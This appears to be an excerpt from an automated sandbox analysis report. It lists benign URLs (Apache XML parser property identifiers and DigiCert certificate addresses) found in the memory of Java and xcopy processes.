Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processort5
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner8
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerSN
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerdAt8
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver7
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-handlers
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/error-reportersG
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binderS;
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-bindery
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context:
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/namespace-contextC
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolverti=
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerF
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerdProF
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation-managersQ
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory3
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory7
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factorynt7
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd:
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/schemarocess
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler9
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlercK
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/ion
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/locale
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/localeJ
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation#
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation?
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationcF
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationonditi?
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationK
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationaK
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager8
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declaration
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationG
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationtack
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition(
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitions
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitiont(
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: java.exe, 00000002.00000002.1637605836.00000000095F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5A7000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000006.00000002.2846518429.000000000A578000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B55000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000492B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B79000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BEA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B55000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000492B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
